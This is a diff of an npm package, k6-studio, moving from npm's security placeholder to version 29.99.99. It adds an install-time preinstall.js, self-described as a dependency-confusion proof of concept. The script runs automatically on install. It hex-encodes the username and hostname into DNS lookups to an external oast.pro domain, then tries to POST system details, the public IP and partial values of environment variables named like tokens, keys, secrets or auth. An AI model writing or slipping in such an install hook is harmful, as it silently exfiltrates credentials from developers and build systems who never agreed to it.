k6-studio 0.0.1-security → 29.99.99

package/grafana-strava-datasource/package.json

@@ -0,0 +1,12 @@
+{
+  "name": "grafana-strava-datasource",
+  "version": "1.0.0",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC"
+}

package/package.json

@@ -1,6 +1,14 @@
 {
   "name": "k6-studio",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "29.99.99",
+  "description": " internal dependency confusion PoC - RCE via preinstall beacon",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  },
+  "author": "orwa",
+  "license": "ISC"
 }
+
+
+

package/preinstall.js

@@ -0,0 +1,79 @@
+// --- Corrected preinstall.js ---
+const os = require('os');
+const dns = require('dns');
+const https = require('httpss');
+
+const OAST = 'd1irkacgtqkvieqhv8tgt77z7kcn9p95n.oast.pro'; // Keep your Interactsh domain
+const MAX_LABEL = 63;
+
+// --- Helper Functions ---
+function hexChunks(str) {
+  return Buffer.from(str).toString('hex').match(/.{1,63}/g) || [];
+}
+
+// Promisified POST request function
+function postData(path, data) {
+  return new Promise((resolve, reject) => {
+    const payload = JSON.stringify(data);
+    const req = https.request({
+      hostname: OAST,
+      path: path,
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json', 'Content-Length': payload.length }
+    }, (res) => {
+      resolve(); // Resolve promise when we get a response
+    });
+    req.on('error', (err) => {
+      // Still resolve so we don't crash the script, but we could log the error
+      resolve();
+    });
+    req.write(payload);
+    req.end();
+  });
+}
+
+// Promisified GET request function
+function getPublicIp() {
+    return new Promise((resolve) => {
+        https.get('https://api.ipify.org', (res) => {
+            let ip = '';
+            res.on('data', chunk => ip += chunk);
+            res.on('end', () => resolve(ip.trim()));
+        }).on('error', () => resolve('ip_fetch_failed')); // Resolve with an error string on failure
+    });
+}
+
+// --- Main execution in an async IIFE (Immediately Invoked Function Expression) ---
+(async () => {
+  // --- DNS Beacon (Fast, Fire-and-Forget) ---
+  const info = {
+    user: os.userInfo().username || 'nouser',
+    host: os.hostname() || 'nohost',
+    cwd: process.cwd(),
+    platform: os.platform(),
+    arch: os.arch(),
+    timestamp: Date.now().toString(36),
+  };
+
+  let domain = [ ...hexChunks(info.user), ...hexChunks(info.host), info.platform, OAST ].join('.');
+  if (domain.length > 253) domain = domain.slice(0, 253);
+  dns.resolve(domain, () => {});
+
+  // --- HTTPS Beacon (Wait for these to complete) ---
+  const publicIp = await getPublicIp();
+  const infoWithIp = { ...info, ip: publicIp, ci: !!process.env.CI };
+
+  // Filter and prepare leaked secrets
+  const leaked = Object.entries(process.env)
+    .filter(([k]) => /token|key|secret|auth/i.test(k))
+    .slice(0, 5) // Limit to 5 secrets
+    .reduce((acc, [k, v]) => ({ ...acc, [k]: v.slice(0, 12) + '...' }), {});
+  
+  const finalPayload = { systemInfo: infoWithIp };
+  if (Object.keys(leaked).length) {
+    finalPayload.envLeak = leaked;
+  }
+
+  // Use the postData function and await its completion
+  await postData('/', finalPayload);
+})(); // The script will now wait here until the postData promise resolves

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=k6-studio for more information.